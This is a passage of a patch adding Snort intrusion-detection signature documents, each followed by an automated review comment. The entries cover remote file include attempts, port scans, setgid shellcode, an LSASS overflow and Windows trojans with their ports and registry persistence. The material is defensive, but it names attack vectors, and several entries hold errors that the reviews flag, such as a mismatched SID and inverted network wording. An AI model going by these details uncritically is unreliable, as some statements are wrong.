+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
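Review bot: Affected Systems and Additional References are both empty, and the body is the same boilerplate as SIDs 867 and 1176, so nothing identifies what SID 1860 matches. "running ona web server" in Detailed Information should be "running on a web server".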
--- /dev/null
+++ b/doc/signatures/100000592.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000592
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "editor_validate.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"editor_validate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
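Review bot: 'running ona web server' in Detailed Information should be 'on a web server', and 'attackers choosing' (in both Impact and Detailed Information) should be 'attacker's choosing'; the Summary's 'may indicate that an exploitation attempt has been attempted' is redundant and reads better as 'may indicate an exploitation attempt'. Formatting is also out of step with the other files in this patch: no blank line between the Sid value and the separator, none after the Affected Systems line, and most wrapped lines carry trailing whitespace.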
--- /dev/null
+++ b/doc/signatures/100000320.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000320
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "functions.php" using a remote file being passed 
+as the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "functions.php" script used 
+by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
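Review bot: the file opens with two blank lines before 'Rule:', which none of the other documents do; drop them. The same template wording problems as the other remote file include entries are present here: 'running ona web server' in Detailed Information, 'attackers choosing' (attacker's) in Impact and Detailed Information, and the redundant 'an exploitation attempt has been attempted' in the Summary.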
--- /dev/null
+++ b/doc/signatures/122-26.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-26
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a icmp
+filtered sweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
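Review bot: spelling in the first three sections: 'a icmp filtered sweep' in the Summary should read 'an ICMP filtered sweep', 'reconnaisance' in Impact is 'reconnaissance', and 'consititute' in Detailed Information is 'constitute'. In Impact, 'a targeted attack against the targeted systems' repeats itself; 'against the scanned hosts' says what is meant. The False Positives advice to tune the preprocessor for authorised scans is good; since Detailed Information already points at README.sfportscan, a one-line mention that the tuning options are described there would close the loop.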
--- /dev/null
+++ b/doc/signatures/649.txt
@@ -0,0 +1,78 @@
+Rule:  
+--
+Sid:
+649
+--
+Summary:
+Shellcode to set the group identity to 0 (root) was detected.
+
+--
+Impact:
+If this code is executed successfully, it is possible for the current
+process to inherity root group privledges.  
+
+
+--
+Detailed Information:
+Snort detected data resembling the x86 assembly code to change the
+group identity to 0.  
+
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of an attack on a remote service, an attacker may attempt to
+take advantage of insecure coding practices and execute code of his or
+her choosing through techniques known as 'buffer-overflows',
+'format-strings' and others.  Such attacks may contain code to change
+the identity of the current group to that of the root group (setgid
+0).  
+
+--
+Ease of Attack:
+Non-trivial.  Shellcode (and just x86 assembly code in general)
+requires a fairly intimate knowledge of computer architecture, memory
+structures, and many concepts that are part of the more arcane areas
+of computing.  Furthermore, if this was in fact an attack, the
+attacker needs to have a good idea of the design of the both the
+program and the system that he or she is attacking. The x86 setgid
+call itself is not particularly difficult, and by itself is not
+harmful.  However, combined with other carefuly aimed shellcode, it
+can be quite lethal.
+
+--
+False Positives:
+Fairly high.  Large binary transfers, certain web traffic, and even
+mail traffic can trigger this rule, but are not necessarily indicative
+of actual setgid code.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine what stream of traffic generated this particular alert.  If
+you only have the alert but not the entire packet, examine system for
+pecularities.  If you are smart and have the entire packet (or better
+yet, all your traffic for the past n hours), attempt to determine if
+this particular sequence of characters was part of an innocent stream
+of data (large binary transfers, for example) or part of a malicious
+act against your machine.  In either case, check for other activity
+from the host in question -- both currently collected traffic and
+traffic in the future.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+--
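Review bot: the Affected Systems section is empty (it holds only a whitespace line); state which platforms x86 setgid shellcode is relevant to, or remove the section. Several misspellings need fixing: 'inherity root group privledges' in Impact (inherit, privileges), 'carefuly' in Ease of Attack, 'pecularities' in Corrective Action and 'unkown' in Contributors. In Corrective Action, 'If you are smart and have the entire packet' is out of register for reference documentation; 'If you have the entire packet' is enough. 'Rule:' also carries trailing whitespace and, unlike the other files, has no blank line before its separator.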
--- /dev/null
+++ b/doc/signatures/2526.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2526
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
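Review bot: in Detailed Information, 'suscessful' should be 'successful', and 'The problem lies in an unchecked buffer in the LSASS service, suscessful exploitation may ...' is a comma splice; end the sentence after 'service'. 'attcker' in Attack Scenarios is 'attacker', and 'Apply the appropriate vendor supplied patches' in Corrective Action is missing its full stop. Additional References is empty even though the text describes a vendor-patched LSASS flaw and tells the reader to apply the patch; the vendor security bulletin for it belongs there so the reader can find that patch.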
--- /dev/null
+++ b/doc/signatures/161.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+162
+
+--
+Summary:
+Matrix is a Trojan Horse offering the attacker the ability to upload 
+files to, and download files from the victim host.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Matrix server
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+Matrix is based on the Girlfriend Trojan, see sid 145.
+
+The default name of the server application is Wincfg.exe
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added 
+
+Wincfg.exe ="<DRIVE>:\WINDOWS\Wincfg.exe"
+
+A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS83
+
+--
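Review bot: the file is doc/signatures/161.txt but the Sid field says 162; one of the two is wrong, and because the doc directory is keyed by SID the mismatch leaves whichever rule this describes without its documentation. Please check against the rule and correct it. This entry also has no Affected Systems section; the OS list under Detailed Information should move (or be copied) there to match the other files. The registry line 'Wincfg.exe ="<DRIVE>:\WINDOWS\Wincfg.exe"' has the space on the wrong side of '=', and it is a value under the Run key rather than a key, so 'Registry values added' would be the accurate heading.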
--- /dev/null
+++ b/doc/signatures/108.txt
@@ -0,0 +1,99 @@
+Rule:
+
+--
+Sid:
+108
+
+--
+Summary:
+QAZ is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows executable that makes 
+changes to the system registry.
+
+The Trojan changes system startup files and registry settings to add the
+QAZ sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	108	QAZ Worm Client Login access
+	731	Virus - Possible QAZ Worm (Indicates worm activity)
+	775	Virus - Possible QAZ Worm Infection (Indicates worm activity)
+	733	Virus - Possible QAZ Worm Calling Home (Indicates the worm is trying to send mail)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+
+Registry keys added are:
+
+	StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq
+
+This will start the Trojan each time notepad is executed.
+
+Look for the existence of the file note.com. The file notepad.exe may have been replaced with a Trojaned version that is approximately 120 kb in size (the original is 52 kb).
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS501
+http://www.whitehats.com/info/IDS498
+http://www.whitehats.com/info/IDS499
+
+McAfee
+http://vil.nai.com/vil/content/v_98775.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.qaz.a.html
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/qaz.htm
+
+--
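Review bot: 'QAZ sever' in Detailed Information should be 'QAZ server', and 'a windows executable' should capitalise Windows. The registry path in Corrective Action, 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run', has a stray space in 'Current Version'; the key is 'CurrentVersion' (the Matrix entry in this same patch spells it correctly), and the 'StartIE=...' line beneath it is a value under that key, not a key. An Affected Systems section is missing here too; the OS list under Detailed Information belongs in it. The SID/Message table cross-referencing sids 731, 733 and 775 is useful but unexplained; one sentence introducing it as the related QAZ rules would help.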
--- /dev/null
+++ b/doc/signatures/407.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+407
+
+--
+
+Summary:
+This event is generated when An ICMP Destination Unreachable datagram is detected on the network with an undefined ICMP Code.  
+
+--
+
+Impact:
+ICMP Codes for Destination Unreachable datagrams are defined in RFC 792 and RFC 1812.  The datagram that generated this event is not defined in either of these RFCs.  This could be an indication of a DoS (Denial of Service) attempt against the network. 
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, improperly configured hosts, or an attempted DoS.
+
+--
+
+Attack Scenarios:
+Invalid or undefined ICMP codes should never be seen in normal network conditions.  A remote attacker could be generating these packets in an attempt to cause an DoS.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
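Review bot: the Summary has 'when An ICMP' with a stray capital; in Detailed Information 'could indication routing problems' should be 'could indicate', and in Attack Scenarios 'an DoS' is 'a DoS'. Corrective Action's 'This rule detects informational network information' is tautological ('This is an informational rule' suffices) and sits awkwardly beside Impact, which raises a possible DoS; saying that no action is needed unless the volume of these datagrams is high would reconcile the two. Additional References says 'None' while Impact cites RFC 792 and RFC 1812; add links to those two RFCs.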
--- /dev/null
+++ b/doc/signatures/100000121.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000121
+
+-- 
+Summary: 
+This event is generated when a script named "test" is accessed from a location 
+outside of EXTERNAL_NET.
+
+-- 
+
+Impact: 
+Varies depending upon the script.
+
+--
+Detailed Information:
+Generally speaking, scripts named "test" should not be accessed by anyone 
+outside of the developer's internal network. These scripts rarely lack proper 
+input sanitization, often allow unfettered access to sensitive resources, and 
+can suffer from a host of vulnerabilities due to the fact that developers 
+generally do not have security in mind when testing a script. 
+
+--
+Affected Systems:
+Any system with an improperly secured developer test script.
+
+--
+
+Attack Scenarios: 
+Attacks vary depending upon the nature of the script.
+
+-- 
+
+Ease of Attack: 
+The ease of attacks vary depending upon the nature of the script.
+
+-- 
+
+False Positives:
+Some scripts may legitimately be named "test", or developers may access these 
+scripts from outside of their internal development environment. Users who are 
+receiving an inordinate amount of false positives may wish to disable this rule.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Test scripts should be properly hardened if they are made publicly available, 
+or access to them should be restricted to authorized personnel.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
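Review bot: the Summary says the script is accessed 'from a location outside of EXTERNAL_NET', which inverts the usual Snort meaning: EXTERNAL_NET is the untrusted side, so the rule presumably fires on access from EXTERNAL_NET, i.e. from outside HOME_NET. Please check the rule header and correct the wording. In Detailed Information, 'These scripts rarely lack proper input sanitization' says the opposite of what the paragraph argues; 'often lack' is intended. 'The ease of attacks vary' in Ease of Attack should be 'The ease of attack varies'.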
--- /dev/null
+++ b/doc/signatures/100000615.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000615
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_premium_sponsored.php" using a remote file being 
+passed as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_premium_sponsored.php" script used by the "Indexu" application running on 
+a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
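Review bot: same issues as the other Indexu entry in this patch: 'running ona web server' and 'attackers choosing' in Detailed Information and Impact, the redundant 'an exploitation attempt has been attempted' in the Summary, no blank line after the Sid value or after the Affected Systems line, and trailing whitespace on most wrapped lines. Since the two Indexu documents differ only in the script name, it is worth fixing the shared template text once and regenerating both.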
--- /dev/null
+++ b/doc/signatures/1611.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1611
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
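Review bot: the Summary says only 'a known vulnerability in a CGI web application' without naming the script or parameter the rule matches, so a reader cannot tell what SID 1611 covers; the remote file include entries in this patch name the file and parameter, and this one should too. Also 'running ona web server' and 'attackers choosing' (attacker's) in Detailed Information, and the line ending 'exploited by the attacker.' runs well past the wrap width used in the rest of the file.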
--- /dev/null
+++ b/doc/signatures/100000560.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000560
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "eNpaper1" application running on a webserver. 
+Access to the file "root_header.php" using a remote file being passed as the 
+"ppath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "ppath" parameter in the "root_header.php" script used 
+by the "eNpaper1" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using eNpaper1
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
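Review bot: this eNpaper1 entry carries the same template defects as the Indexu and ScozNews ones: 'running ona web server' in Detailed Information, 'attackers choosing' for 'attacker's choosing' in Impact and Detailed Information, the redundant 'exploitation attempt has been attempted' in the Summary, missing blank lines after the Sid value and the Affected Systems line, and trailing whitespace on wrapped lines. A single fix to the generator template would clear all of them.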
--- /dev/null
+++ b/doc/signatures/883.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+883
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
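Review bot: this document is word for word the same as the 1611 entry apart from the Sid, so nothing tells the reader what SID 883 actually matches; please name the script, path or pattern the rule looks for in the Summary and Detailed Information. The shared text has the same typos as 1611: 'running ona web server', 'attackers choosing' (attacker's), and the over-long line ending 'exploited by the attacker.'.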
--- /dev/null
+++ b/doc/signatures/3010.txt
@@ -0,0 +1,73 @@
+Rule: 
+
+--
+Sid: 
+3010
+
+-- 
+Summary: 
+This event is generated when an attacker attempts to find the victim's
+Windows directory with the RUX the Tick trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to your
+system, enabling him to upload and execute file on your computer. The
+attacker can use this function to upload additional backdoors to the
+victim's sytem and execute them.
+
+--
+Detailed Information:
+When executed, RUX the Tick opens up its assigned port (default is
+22222) for communication with the attacker. RUX the Tick has three
+functions: Get Windows Directory, Get System Directory, and Upload And
+Execute File. Get Windows Directory and Get System Directory are used
+for reconnaissance. Upload And Execute File is mainly used to upload and
+run other backdoors onto the victim's computer.
+
+--
+Affected Systems:
+	Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoors in disguise. Once the victim
+mistakenly installs the server program, the attacker usually will employ
+an IP scanner program to find the IP addresses of victims that have
+installed the program. Then the attacker enters the IP address, port
+number (which  is assigned to the server program by the attacker:
+default is 22222), and presses the connect button and he has access to
+your computer.
+
+-- 
+Ease of Attack:
+Simple.
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+Using Windows Task Manager, kill these processes: ruxserver.exe and
+server.exe. Use Windows Explorer to find ruxserver.exe and delete the file.
+
+Keep your anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Ricky Macatee <rmacatee@sourcefire.com>
+
+-- 
+Additional References:
+
+PestPatrol:
+http://www.pestpatrol.com/PestInfo/R/RUX.ASP
+
+--
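Review bot: in Impact, 'upload and execute file' should be 'files' and 'victim's sytem' is 'system'; 'number (which  is assigned' in Attack Scenarios has a double space. Attack Scenarios also mixes user advice into the attack description ('Be wary of suspicious files because they often can be backdoors in disguise') and switches to the second person ('he has access to your computer'); the advice belongs under Corrective Action, and the rest of the section should describe the steps in the third person as the other files do.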
